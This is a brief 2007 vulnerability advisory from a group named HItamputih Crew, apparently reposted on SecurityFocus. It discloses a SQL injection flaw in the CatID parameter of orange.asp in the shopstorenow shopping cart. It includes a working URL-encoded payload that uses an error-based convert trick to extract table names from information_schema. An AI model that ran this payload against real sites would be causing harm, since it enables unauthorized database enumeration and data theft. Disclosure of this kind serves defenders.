shopstorenow (orange.asp) sql injection Jan 06 2007 05:19PM
emel_gw_ini yahoo com
============================= HItamputih Crew ====================
#hitamputih Advisory
##Discovered By : IbnuSina
#-----------------------------------------------------------
#Software: shopstorenow E-commerce Shopping Cart
#Method: SQL Injection
#
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//orange.asp?CatID=[SQL]
================================================
ex:

http://[target]/[path]//orange.asp?CatID=1'%20and%201=convert(int,(selec
t%20top%201%20table_name%20from%20information_schema.tables))--sp_passwo
rd

########################################################################
#################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus